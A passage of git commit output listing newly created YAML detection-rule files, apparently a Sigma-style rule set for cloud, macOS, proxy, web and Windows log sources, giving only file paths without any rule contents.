bin/main/rules/others_cloud/gcp/gcp_kubernetes_admission_controller.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_kubernetes_cronjob.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_kubernetes_rolebinding.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_service_account_disabled_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_service_account_modified.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_sql_database_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/gworkspace/gworkspace_application_removed.yml create mode 100644 bin/main/rules/others_cloud/gworkspace/gworkspace_granted_domain_api_access.yml create mode 100644 bin/main/rules/others_cloud/gworkspace/gworkspace_mfa_disabled.yml create mode 100644 bin/main/rules/others_cloud/gworkspace/gworkspace_role_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/gworkspace/gworkspace_role_privilege_deleted.yml create mode 100644 bin/main/rules/others_cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_activity_by_terminated_user.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_activity_from_infrequent_country.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_from_susp_ip_addresses.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_impossible_travel_activity.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_logon_from_risky_ip_address.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_new_federated_domain_added.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_potential_ransomware_activity.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_susp_inbox_forwarding.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml create mode 100644 bin/main/rules/others_cloud/m365/microsoft365_user_restricted_from_sending_email.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_admin_role_assigned_to_user_or_group.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_api_token_created.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_api_token_revoked.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_application_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_mfa_reset_or_deactivated.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_network_zone_deactivated_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_policy_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_policy_rule_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_security_threat_detected.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_unauthorized_access_to_app.yml create mode 100644 bin/main/rules/others_cloud/okta/okta_user_account_locked_out.yml create mode 100644 bin/main/rules/others_cloud/onelogin/onelogin_assumed_another_user.yml create mode 100644 bin/main/rules/others_cloud/onelogin/onelogin_user_account_locked.yml create mode 100644 bin/main/rules/others_compliance/default_credentials_usage.yml create mode 100644 bin/main/rules/others_compliance/firewall_cleartext_protocols.yml create mode 100644 bin/main/rules/others_compliance/group_modification_logging.yml create mode 100644 bin/main/rules/others_compliance/host_without_firewall.yml create mode 100644 bin/main/rules/others_compliance/netflow_cleartext_protocols.yml create mode 100644 bin/main/rules/others_compliance/workstation_was_locked.yml create mode 100644 bin/main/rules/others_macos/file_event/file_event_macos_emond_launch_daemon.yml create mode 100644 bin/main/rules/others_macos/file_event/file_event_macos_startup_items.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_applescript.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_base64_decode.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_binary_padding.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_change_file_time_attr.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_clear_system_logs.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_create_account.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_create_hidden_account.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_creds_from_keychain.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_disable_security_tools.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_find_cred_in_files.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_gui_input_capture.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_local_account.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_local_groups.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_network_service_scanning.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_network_sniffing.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_remote_system_discovery.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_screencapture.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_security_software_discovery.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_space_after_filename.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_split_file_into_pieces.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_susp_histfile_operations.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_system_network_discovery.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml create mode 100644 bin/main/rules/others_macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml create mode 100644 bin/main/rules/others_proxy/proxy_apt40.yml create mode 100644 bin/main/rules/others_proxy/proxy_apt_domestic_kitten.yml create mode 100644 bin/main/rules/others_proxy/proxy_baby_shark.yml create mode 100644 bin/main/rules/others_proxy/proxy_chafer_malware.yml create mode 100644 bin/main/rules/others_proxy/proxy_cobalt_amazon.yml create mode 100644 bin/main/rules/others_proxy/proxy_cobalt_malformed_uas.yml create mode 100644 bin/main/rules/others_proxy/proxy_cobalt_ocsp.yml create mode 100644 bin/main/rules/others_proxy/proxy_cobalt_onedrive.yml create mode 100644 bin/main/rules/others_proxy/proxy_download_susp_dyndns.yml create mode 100644 bin/main/rules/others_proxy/proxy_download_susp_tlds_blacklist.yml create mode 100644 bin/main/rules/others_proxy/proxy_download_susp_tlds_whitelist.yml create mode 100644 bin/main/rules/others_proxy/proxy_downloadcradle_webdav.yml create mode 100644 bin/main/rules/others_proxy/proxy_empire_ua_uri_combos.yml create mode 100644 bin/main/rules/others_proxy/proxy_empty_ua.yml create mode 100644 bin/main/rules/others_proxy/proxy_ios_implant.yml create mode 100644 bin/main/rules/others_proxy/proxy_java_class_download.yml create mode 100644 bin/main/rules/others_proxy/proxy_powershell_ua.yml create mode 100644 bin/main/rules/others_proxy/proxy_pwndrop.yml create mode 100644 bin/main/rules/others_proxy/proxy_raw_paste_service_access.yml create mode 100644 bin/main/rules/others_proxy/proxy_susp_flash_download_loc.yml create mode 100644 bin/main/rules/others_proxy/proxy_telegram_api.yml create mode 100644 bin/main/rules/others_proxy/proxy_turla_comrat.yml create mode 100644 bin/main/rules/others_proxy/proxy_ua_apt.yml create mode 100644 bin/main/rules/others_proxy/proxy_ua_bitsadmin_susp_ip.yml create mode 100644 bin/main/rules/others_proxy/proxy_ua_bitsadmin_susp_tld.yml create mode 100644 bin/main/rules/others_proxy/proxy_ua_cryptominer.yml create mode 100644 bin/main/rules/others_proxy/proxy_ua_frameworks.yml create mode 100644 bin/main/rules/others_proxy/proxy_ua_hacktool.yml create mode 100644 bin/main/rules/others_proxy/proxy_ua_malware.yml create mode 100644 bin/main/rules/others_proxy/proxy_ua_susp.yml create mode 100644 bin/main/rules/others_proxy/proxy_ursnif_malware_c2_url.yml create mode 100644 bin/main/rules/others_proxy/proxy_ursnif_malware_download_url.yml create mode 100644 bin/main/rules/others_web/web_apache_segfault.yml create mode 100644 bin/main/rules/others_web/web_apache_threading_error.yml create mode 100644 bin/main/rules/others_web/web_cve_2010_5278_exploitation_attempt.yml create mode 100644 bin/main/rules/others_web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2018_2894_weblogic_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2019_11510_pulsesecure_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2019_19781_citrix_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2019_3398_confluence.yml create mode 100644 bin/main/rules/others_web/web_cve_2020_0688_exchange_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2020_0688_msexchange.yml create mode 100644 bin/main/rules/others_web/web_cve_2020_10148_solarwinds_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2020_14882_weblogic_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2020_28188_terramaster_rce_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2020_3452_cisco_asa_ftd.yml create mode 100644 bin/main/rules/others_web/web_cve_2020_5902_f5_bigip.yml create mode 100644 bin/main/rules/others_web/web_cve_2020_8193_8195_citrix_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_2109_weblogic_rce_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_21978_vmware_view_planner_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_22005_vmware_file_upload.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_22123_fortinet_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_22893_pulse_secure_rce_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_26814_wzuh_rce.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_26858_iis_rce.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_28480_exchange_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_33766_msexchange_proxytoken.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_40539_adselfservice.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_41773_apache_path_traversal.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_42237_sitecore_report_ashx.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_43798_grafana.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_44228_log4j.yml create mode 100644 bin/main/rules/others_web/web_cve_2021_44228_log4j_fields.yml create mode 100644 bin/main/rules/others_web/web_exchange_exploitation_hafnium.yml create mode 100644 bin/main/rules/others_web/web_exchange_proxyshell.yml create mode 100644 bin/main/rules/others_web/web_exchange_proxyshell_successful.yml create mode 100644 bin/main/rules/others_web/web_iis_tilt_shortname_scan.yml create mode 100644 bin/main/rules/others_web/web_java_payload_in_access_logs.yml create mode 100644 bin/main/rules/others_web/web_jndi_exploit.yml create mode 100644 bin/main/rules/others_web/web_multiple_susp_resp_codes_single_source.yml create mode 100644 bin/main/rules/others_web/web_nginx_core_dump.yml create mode 100644 bin/main/rules/others_web/web_path_traversal_exploitation_attempt.yml create mode 100644 bin/main/rules/others_web/web_solarwinds_supernova_webshell.yml create mode 100644 bin/main/rules/others_web/web_sonicwall_jarrewrite_exploit.yml create mode 100644 bin/main/rules/others_web/web_source_code_enumeration.yml create mode 100644 bin/main/rules/others_web/web_sql_injection_in_access_logs.yml create mode 100644 bin/main/rules/others_web/web_ssti_in_access_logs.yml create mode 100644 bin/main/rules/others_web/web_susp_windows_path_uri.yml create mode 100644 bin/main/rules/others_web/web_unc2546_dewmode_php_webshell.yml create mode 100644 bin/main/rules/others_web/web_webshell_regeorg.yml create mode 100644 bin/main/rules/others_web/web_win_webshells_in_access_logs.yml create mode 100644 bin/main/rules/others_web/web_xss_in_access_logs.yml create mode 100644 bin/main/rules/rule_categories.json create mode 100644 bin/main/rules/s3/aws_s3_data_management_tampering.yml create mode 100644 bin/main/rules/test_windows/dns_query_win_regsvr32_network_activity.yml create mode 100644 bin/main/rules/test_windows/net_connection_win_regsvr32_network_activity.yml create mode 100644 bin/main/rules/test_windows/proc_creation_win_susp_regsvr32_no_dll.yml create mode 100644 bin/main/rules/test_windows/proc_creation_win_system_exe_anomaly.yml create mode 100644 bin/main/rules/test_windows/win_sample_rule.yml create mode 100644 bin/main/rules/waf/aws_waf/aws_waf_web_susp_useragents.yml create mode 100644 bin/main/rules/waf/web_cve_2023_25717_ruckus_wireless_admin_exploit_attempt.yml create mode 100644 bin/main/rules/waf/web_sql_injection_in_access_logs.yml create mode 100644 bin/main/rules/waf/web_susp_useragents.yml create mode 100644 bin/main/rules/waf/web_xss_in_access_logs.yml create mode 100644 bin/main/rules/windows/builtin/application/win_audit_cve.yml create mode 100644 bin/main/rules/windows/builtin/application/win_av_relevant_match.yml create mode 100644 bin/main/rules/windows/builtin/application/win_builtin_remove_application.yml create mode 100644 bin/main/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml create mode 100644 bin/main/rules/windows/builtin/application/win_susp_backup_delete.yml create mode 100644 bin/main/rules/windows/builtin/application/win_susp_msmpeng_crash.yml create mode 100644 bin/main/rules/windows/builtin/application/win_vul_cve_2020_0688.yml create mode 100644 bin/main/rules/windows/builtin/application/win_vul_cve_2021_41379.yml create mode 100644 bin/main/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml create mode 100644 bin/main/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml create mode 100644 bin/main/rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml create mode 100644 bin/main/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml create mode 100644 bin/main/rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml create mode 100644 bin/main/rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml create mode 100644 bin/main/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml create mode 100644 bin/main/rules/windows/builtin/code_integrity/win_codeintegrity_failed_driver_load.yml create mode 100644 bin/main/rules/windows/builtin/dns_server/win_apt_gallium.yml create mode 100644 bin/main/rules/windows/builtin/dns_server/win_susp_dns_config.yml create mode 100644 bin/main/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml create mode 100644 bin/main/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml create mode 100644 bin/main/rules/windows/builtin/firewall_as/win_firewall_as_change_rule.yml create mode 100644 bin/main/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml create mode 100644 bin/main/rules/windows/builtin/firewall_as/win_firewall_as_failed.yml create mode 100644 bin/main/rules/windows/builtin/firewall_as/win_firewall_as_reset.yml create mode 100644 bin/main/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml create mode 100644 bin/main/rules/windows/builtin/ldap/win_ldap_recon.yml create mode 100644 bin/main/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml create mode 100644 bin/main/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml create mode 100644 bin/main/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml create mode 100644 bin/main/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml create mode 100644 bin/main/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml create mode 100644 bin/main/rules/windows/builtin/msexchange/win_exchange_transportagent.yml create mode 100644 bin/main/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml create mode 100644 bin/main/rules/windows/builtin/msexchange/win_set_oabvirtualdirectory_externalurl.yml create mode 100644 bin/main/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml create mode 100644 bin/main/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml create mode 100644 bin/main/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml create mode 100644 bin/main/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml create mode 100644 bin/main/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml create mode 100644 bin/main/rules/windows/builtin/security/win_aadhealth_mon_agent_regkey_access.yml create mode 100644 bin/main/rules/windows/builtin/security/win_aadhealth_svc_agent_regkey_access.yml create mode 100644 bin/main/rules/windows/builtin/security/win_account_backdoor_dcsync_rights.yml create mode 100644 bin/main/rules/windows/builtin/security/win_account_discovery.yml create mode 100644 bin/main/rules/windows/builtin/security/win_ad_object_writedac_access.yml create mode 100644 bin/main/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml create mode 100644 bin/main/rules/windows/builtin/security/win_ad_user_enumeration.yml create mode 100644 bin/main/rules/windows/builtin/security/win_adcs_certificate_template_configuration_vulnerability.yml create mode 100644 bin/main/rules/windows/builtin/security/win_adcs_certificate_template_configuration_vulnerability_eku.yml create mode 100644 bin/main/rules/windows/builtin/security/win_admin_rdp_login.yml create mode 100644 bin/main/rules/windows/builtin/security/win_admin_share_access.yml create mode 100644 bin/main/rules/windows/builtin/security/win_alert_active_directory_user_control.yml create mode 100644 bin/main/rules/windows/builtin/security/win_alert_ad_user_backdoors.yml create mode 100644 bin/main/rules/windows/builtin/security/win_alert_enable_weak_encryption.yml create mode 100644 bin/main/rules/windows/builtin/security/win_alert_ruler.yml create mode 100644 bin/main/rules/windows/builtin/security/win_apt_chafer_mar18_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_apt_slingshot.yml create mode 100644 bin/main/rules/windows/builtin/security/win_apt_wocao.yml create mode 100644 bin/main/rules/windows/builtin/security/win_atsvc_task.yml create mode 100644 bin/main/rules/windows/builtin/security/win_camera_microphone_access.yml create mode 100644 bin/main/rules/windows/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml create mode 100644 bin/main/rules/windows/builtin/security/win_dcom_iertutil_dll_hijack.yml create mode 100644 bin/main/rules/windows/builtin/security/win_dcsync.yml create mode 100644 bin/main/rules/windows/builtin/security/win_defender_bypass.yml create mode 100644 bin/main/rules/windows/builtin/security/win_disable_event_logging.yml create mode 100644 bin/main/rules/windows/builtin/security/win_dpapi_domain_backupkey_extraction.yml create mode 100644 bin/main/rules/windows/builtin/security/win_dpapi_domain_masterkey_backup_attempt.yml create mode 100644 bin/main/rules/windows/builtin/security/win_etw_modification.yml create mode 100644 bin/main/rules/windows/builtin/security/win_event_log_cleared.yml create mode 100644 bin/main/rules/windows/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_external_device.yml create mode 100644 bin/main/rules/windows/builtin/security/win_global_catalog_enumeration.yml create mode 100644 bin/main/rules/windows/builtin/security/win_gpo_scheduledtasks.yml create mode 100644 bin/main/rules/windows/builtin/security/win_hidden_user_creation.yml create mode 100644 bin/main/rules/windows/builtin/security/win_hybridconnectionmgr_svc_installation.yml create mode 100644 bin/main/rules/windows/builtin/security/win_impacket_psexec.yml create mode 100644 bin/main/rules/windows/builtin/security/win_impacket_secretdump.yml create mode 100644 bin/main/rules/windows/builtin/security/win_invoke_obfuscation_clip_services_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_invoke_obfuscation_obfuscated_iex_services_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_invoke_obfuscation_stdin_services_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_invoke_obfuscation_var_services_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_invoke_obfuscation_via_compress_services_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_invoke_obfuscation_via_rundll_services_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_invoke_obfuscation_via_stdin_services_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_invoke_obfuscation_via_use_clip_services_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_invoke_obfuscation_via_use_mshta_services_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_invoke_obfuscation_via_use_rundll32_services_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_invoke_obfuscation_via_var_services_security.yml create mode 100644 bin/main/rules/windows/builtin/security/win_iso_mount.yml create mode 100644 bin/main/rules/windows/builtin/security/win_lm_namedpipe.yml create mode 100644 bin/main/rules/windows/builtin/security/win_lolbas_execution_of_nltest.yml create mode 100644 bin/main/rules/windows/builtin/security/win_lsass_access_non_system_account.yml create mode 100644 bin/main/rules/windows/builtin/security/win_mal_wceaux_dll.yml create mode 100644 bin/main/rules/windows/builtin/security/win_metasploit_authentication.yml create mode 100644 bin/main/rules/windows/builtin/security/win_net_ntlm_downgrade.yml create mode 100644 bin/main/rules/windows/builtin/security/win_net_share_obj_susp_desktop_ini.yml create mode 100644 bin/main/rules/windows/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml create mode 100644 bin/main/rules/windows/builtin/security/win_not_allowed_rdp_access.yml create mode 100644 bin/main/rules/windows/builtin/security/win_overpass_the_hash.yml create mode 100644 bin/main/rules/windows/builtin/security/win_pass_the_hash.yml create mode 100644 bin/main/rules/windows/builtin/security/win_pass_the_hash_2.yml create mode 100644 bin/main/rules/windows/builtin/security/win_petitpotam_network_share.yml create mode 100644 bin/main/rules/windows/builtin/security/win_petitpotam_susp_tgt_request.yml create mode 100644 bin/main/rules/windows/builtin/security/win_possible_dc_shadow.yml create mode 100644 bin/main/rules/windows/builtin/security/win_privesc_cve_2020_1472.yml create mode 100644 bin/main/rules/windows/builtin/security/win_protected_storage_service_access.yml create mode 100644 bin/main/rules/windows/builtin/security/win_rare_schtasks_creations.yml create mode 100644 bin/main/rules/windows/builtin/security/win_rdp_bluekeep_poc_scanner.yml create mode 100644 bin/main/rules/windows/builtin/security/win_rdp_localhost_login.yml create mode 100644 bin/main/rules/windows/builtin/security/win_rdp_reverse_tunnel.yml create mode 100644 bin/main/rules/windows/builtin/security/win_register_new_logon_process_by_rubeus.yml create mode 100644 bin/main/rules/windows/builtin/security/win_remote_powershell_session.yml create mode 100644 bin/main/rules/windows/builtin/security/win_remote_registry_management_using_reg_utility.yml create mode 100644 bin/main/rules/windows/builtin/security/win_sam_registry_hive_handle_request.yml create mode 100644 bin/main/rules/windows/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml create mode 100644 bin/main/rules/windows/builtin/security/win_scheduled_task_deletion.yml create mode 100644 bin/main/rules/windows/builtin/security/win_scm_database_handle_failure.yml create mode 100644 bin/main/rules/windows/builtin/security/win_scm_database_privileged_operation.yml create mode 100644 bin/main/rules/windows/builtin/security/win_scrcons_remote_wmi_scripteventconsumer.yml create mode 100644 bin/main/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml create mode 100644 bin/main/rules/windows/builtin/security/win_security_mal_creddumper.yml create mode 100644 bin/main/rules/windows/builtin/security/win_security_mal_service_installs.yml create mode 100644 bin/main/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml create mode 100644 bin/main/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml create mode 100644 bin/main/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml create mode 100644 bin/main/rules/windows/builtin/security/win_security_tap_driver_installation.yml create mode 100644 bin/main/rules/windows/builtin/security/win_security_wmi_persistence.yml create mode 100644 bin/main/rules/windows/builtin/security/win_smb_file_creation_admin_shares.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_add_domain_trust.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_add_sid_history.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_codeintegrity_check_failure.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_dsrm_password_change.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_eventlog_cleared.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_logon_reasons.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_logon_source.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_logons_explicit_credentials.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_logons_single_process.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_logons_single_source.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_logons_single_source2.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_logons_single_source_kerberos.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_logons_single_source_kerberos2.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_logons_single_source_kerberos3.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_logons_single_source_ntlm.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_logons_single_source_ntlm2.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_failed_remote_logons_single_source.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_interactive_logons.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_kerberos_manipulation.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_krbrelayup.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_ldap_dataexchange.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_local_anon_logon_created.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_logon_explicit_credentials.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_lsass_dump.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_multiple_files_renamed_or_deleted.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_net_recon_activity.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_opened_encrypted_zip.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_opened_encrypted_zip_filename.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_opened_encrypted_zip_outlook.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_outbound_kerberos_connection.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_psexec.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_raccess_sensitive_fext.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_rc4_kerberos.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_rottenpotato.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_samr_pwset.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_sdelete.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_time_modification.yml create mode 100644 bin/main/rules/windows/builtin/security/win_susp_wmi_login.yml create mode 100644 bin/main/rules/windows/builtin/security/win_svcctl_remote_service.yml create mode 100644 bin/main/rules/windows/builtin/security/win_syskey_registry_access.yml create mode 100644 bin/main/rules/windows/builtin/security/win_sysmon_channel_reference_deletion.yml create mode 100644 bin/main/rules/windows/builtin/security/win_transferring_files_with_credential_data_via_network_shares.yml create mode 100644 bin/main/rules/windows/builtin/security/win_user_added_to_local_administrators.yml create mode 100644 bin/main/rules/windows/builtin/security/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.yml create mode 100644 bin/main/rules/windows/builtin/security/win_user_creation.yml create mode 100644 bin/main/rules/windows/builtin/security/win_user_driver_loaded.yml create mode 100644 bin/main/rules/windows/builtin/security/win_vssaudit_secevent_source_registration.yml create mode 100644 bin/main/rules/windows/builtin/security/win_wmiprvse_wbemcomn_dll_hijack.yml create mode 100644 bin/main/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml create mode 100644 bin/main/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml create mode 100644 bin/main/rules/windows/builtin/system/win_apt_carbonpaper_turla.yml create mode 100644 bin/main/rules/windows/builtin/system/win_apt_chafer_mar18_system.yml create mode 100644 bin/main/rules/windows/builtin/system/win_apt_stonedrill.yml create mode 100644 bin/main/rules/windows/builtin/system/win_apt_turla_service_png.yml create mode 100644 bin/main/rules/windows/builtin/system/win_cobaltstrike_service_installs.yml create mode 100644 bin/main/rules/windows/builtin/system/win_eventlog_cleared.yml create mode 100644 bin/main/rules/windows/builtin/system/win_hack_smbexec.yml create mode 100644 bin/main/rules/windows/builtin/system/win_invoke_obfuscation_clip_services.yml create mode 100644 bin/main/rules/windows/builtin/system/win_invoke_obfuscation_obfuscated_iex_services.yml create mode 100644 bin/main/rules/windows/builtin/system/win_invoke_obfuscation_stdin_services.yml create mode 100644 bin/main/rules/windows/builtin/system/win_invoke_obfuscation_var_services.yml create mode 100644 bin/main/rules/windows/builtin/system/win_invoke_obfuscation_via_compress_services.yml create mode 100644 bin/main/rules/windows/builtin/system/win_invoke_obfuscation_via_rundll_services.yml create mode 100644 bin/main/rules/windows/builtin/system/win_invoke_obfuscation_via_stdin_services.yml create mode 100644 